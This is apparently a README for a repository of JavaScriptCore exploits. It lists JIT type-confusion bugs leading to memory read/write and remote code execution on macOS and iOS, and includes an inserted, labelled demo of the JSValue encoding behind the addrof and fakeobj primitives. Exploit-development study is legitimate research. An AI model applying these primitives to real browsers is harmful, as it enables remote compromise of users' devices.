Exploit Playground

Disclaimer

All source code in this repository is provided for educational and informational purposes only and should not be construed as legal advice or as an offer to perform legal services on any subject matter.

The information is not guaranteed to be correct, complete or current.

The author (Alexandro Luongo) makes no warranty (expressed or implied) about the accuracy or reliability of the information at this repository or at any other website to which it is linked.

Exploits

JavaScriptCore

instanceof_exploit

  • JIT bug to trigger a controlled type confusion
  • Arbitrary Memory Read/Write using boxed/unboxed arrays
  • Remote Code Execution (macOS)

Also tested on iOS 11.3.1 (patched somewhere around 11.4 / 11.4.1)
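The boxed/unboxed array distinction behind the read/write primitive listed above, as an added example that is not code from this repository and does not reproduce its JIT bug. It shows the 64-bit JSValue encoding from the JavaScriptCore source of the era these exploits target (JSCJSValue.h: doubles stored as raw bits plus 2^48, int32s under the 0xffff tag, pointers with the top 16 bits clear; later JSC builds moved the double offset to 2^49), and why seeing one butterfly both as unboxed doubles and as boxed cells yields addrof and fakeobj. The "confused butterfly" is a constructed ArrayBuffer standing in for the type-confused array, and every address in it is made up.

```javascript
// Added example, not code from this repository. Demonstrates the JSValue
// encoding that turns a boxed/unboxed array confusion into addrof/fakeobj.
// Constants follow 64-bit JSC of the 2018 era (JSCJSValue.h). Newer JSC uses
// a 2^49 double offset; adjust DOUBLE_ENCODE_OFFSET for such builds.
'use strict';

const DOUBLE_ENCODE_OFFSET = 1n << 48n;
const TAG_TYPE_NUMBER = 0xffff000000000000n;
const MASK64 = (1n << 64n) - 1n;

// One 8-byte scratch cell viewed both as a double and as a 64-bit word.
const scratchF64 = new Float64Array(1);
const scratchU64 = new BigUint64Array(scratchF64.buffer);

// Raw IEEE-754 bits of a double (what an unboxed ArrayWithDouble cell holds).
function doubleToBits(d) {
  scratchF64[0] = d;
  return scratchU64[0];
}

// The double whose bit pattern equals the given 64-bit word.
function bitsToDouble(bits) {
  scratchU64[0] = bits & MASK64;
  return scratchF64[0];
}

// Encode a value as the 64-bit cell a boxed (JSValue) array would store.
// A BigInt argument is treated as a raw object pointer.
function boxValue(v) {
  if (typeof v === 'bigint') return v & MASK64;
  const isInt32 = Number.isInteger(v) && v >= -(2 ** 31) && v < 2 ** 31 && !Object.is(v, -0);
  if (isInt32) return TAG_TYPE_NUMBER | BigInt(v >>> 0);
  return (doubleToBits(v) + DOUBLE_ENCODE_OFFSET) & MASK64;
}

// Decode a boxed cell. Simplified: the few special immediates JSC keeps in
// the pointer range (true/false/null/undefined) are reported as pointers.
function unboxValue(cell) {
  const bits = cell & MASK64;
  if ((bits & TAG_TYPE_NUMBER) === TAG_TYPE_NUMBER) {
    return { type: 'int32', value: Number(BigInt.asIntN(32, bits & 0xffffffffn)) };
  }
  if ((bits >> 48n) === 0n) return { type: 'pointer', value: bits };
  return { type: 'double', value: bitsToDouble(bits - DOUBLE_ENCODE_OFFSET) };
}

// Constructed stand-in for a type-confused butterfly: the same storage seen
// as unboxed doubles (what the confused ArrayWithDouble reads) and as boxed
// cells (what the engine believes are JSValues). No real bug is involved.
function makeConfusedButterfly(nCells) {
  const buf = new ArrayBuffer(8 * nCells);
  return { doubles: new Float64Array(buf), cells: new BigUint64Array(buf) };
}

// addrof: an object pointer in a boxed cell leaks through the unboxed view
// as a double whose raw bits are the address.
function addrofViaConfusion(bf, index) {
  return unboxValue(doubleToBits(bf.doubles[index]));
}

// fakeobj: write, through the unboxed view, the double whose bits are the
// chosen address; the boxed view then holds a pointer JSValue to it.
function fakeobjViaConfusion(bf, index, addr) {
  bf.doubles[index] = bitsToDouble(addr);
  return bf.cells[index];
}

// Stand-alone demonstration with made-up addresses.
function demo() {
  const bf = makeConfusedButterfly(4);
  bf.cells[0] = 0x00007f12deadbe00n;            // pretend an object lives here
  bf.cells[1] = boxValue(42);
  bf.cells[2] = boxValue(1.5);
  const leaked = addrofViaConfusion(bf, 0);
  const faked = fakeobjViaConfusion(bf, 3, 0x0000000123456000n);
  return { leaked, faked, int: unboxValue(bf.cells[1]), dbl: unboxValue(bf.cells[2]) };
}

console.log(demo());
```

In a real exploit the two views come from the confused arrays themselves rather than from an ArrayBuffer, and the faked object must point at memory laid out like a JSCell (a structure ID and butterfly the engine will accept); only the encoding helpers carry over unchanged.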

regexp_exploit

  • JIT bug to trigger a controlled type confusion
  • Arbitrary Memory Read/Write using WebAssembly
  • Remote Code Execution (macOS) using WebAssembly

Tested on macOS 10.14 and iOS 12.1.1